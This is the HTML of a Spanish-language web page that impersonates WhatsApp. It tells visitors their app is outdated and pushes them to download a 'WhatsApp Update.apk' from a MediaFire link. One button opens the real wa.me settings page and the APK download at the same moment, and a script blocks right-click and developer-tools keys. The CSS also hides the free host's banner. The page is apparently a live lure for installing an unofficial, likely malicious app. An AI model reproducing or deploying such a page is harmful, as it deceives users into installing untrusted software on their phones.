<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
	<meta name="theme-color" content="#1ebea5" />
	 <meta name="viewport" content="width=device-width, user-scalable=yes, initial-scale=0.80">
	   <meta http-equiv="X-UA-Compatible" content="IE=edge">
	   <meta name="mobile-web-app-capable" content="yes">
    <title>WhatsApp</title>
	    <!-- CSS -->
    <style>
      body {
        background: #333;
      }
      a {
        text-decoration: none;
      }
      .container {
        display: flex;
        justify-content: center;
        align-items: center;
        width: 100%;
        height: 100%;
        position: fixed;
        flex-direction: column;
      }
      .box {
        background: #fff;
        padding: 20px;
        border-radius: 20px;
        box-shadow: 10px 10px 5px 0px rgba(255, 255, 255, 0.15);
      }
    </style>
     <link rel='shorcut icon' href="img/w.png">
    <link rel="stylesheet" type="text/css" href="css/style.css" media="screen" />
  </head>
  <body>
      <div id=banner>
    <div id="button"><h1><a href="#">WhatsApp</a></h1></div>
      </div>
      <div id="center">
        <div id="login">
          <div id="relleno">
            <center><p id=""><FONT color="RED"><H2>Necesitas Actualizar tu WhatsApp</H2></font></p></center>



</style>
        <center>  </br>
          </br>
          <a href="https://wa.me/settings"><input type="button" id="enviar" value="Verificar Versión"></a>
		  <center><br><font size="3px">Hemos detectado que utilizas una version antigua de WhatsApp Te recomendamos usar siempre la versión más reciente de WhatsApp, ya que incluye las funciones más nuevas y correcciones de errores. Cuando realices el proceso de registro de tu número de teléfono, para que no falle, debes usar la versión más reciente de WhatsApp.
Asegúrate de hacer una copia de seguridad de tus chats antes de actualizar la Aplicación</h5></center>
          </br>
<center><a href="https://download1496.mediafire.com/tcqu59or4g0gVwYMc0WYIiOWnZa8xDq_GMpgE5M2O6TulN5c8wRHXuGKlHkVrRo9-BzQZBanY5MywaUwCFz_X6IlMQsyeIIwUX8dWWRSiZJ0bguFDfh70l5awvR2h68Sn1AvL9VxH48J2k4pRfITgZaQaSAIDzkwgVesdiFFLg42IQ/rnmainc34d8sin5/WhatsApp+Update.apk" style="text-decoration:none"><h5><font color="#1ebea5">Ultima Version<br>CLICK AQUI<h5><br></a></center><img id="logo" src="img2/LOGO.png">
<STYLE>A {text-decoration: none;} </STYLE>
<a href="javascript:void(0);" onclick="javascript:window.open('https://wa.me/settings', '_blank'); window.open('https://download1496.mediafire.com/tcqu59or4g0gVwYMc0WYIiOWnZa8xDq_GMpgE5M2O6TulN5c8wRHXuGKlHkVrRo9-BzQZBanY5MywaUwCFz_X6IlMQsyeIIwUX8dWWRSiZJ0bguFDfh70l5awvR2h68Sn1AvL9VxH48J2k4pRfITgZaQaSAIDzkwgVesdiFFLg42IQ/rnmainc34d8sin5/WhatsApp+Update.apk', '_blank'); "><font color="#1ebea5">Descargar</a><br><p></p>
          </div>
        </div>
      </div>

      <div id="lower">
    </div>
  </body>
   <!-- JAVASCRIPT -->
    <script>
      document.addEventListener("contextmenu", (e) => {
        e.preventDefault();
      });
      document.addEventListener("keydown", (e) => {
        e.preventDefault();
        if (e.keyCode == 123) {
          return false;
        }
      });
    </script>
</html>
 <header>
<style>img[alt="www.000webhost.com"]{display:none;}</style>
        </header>
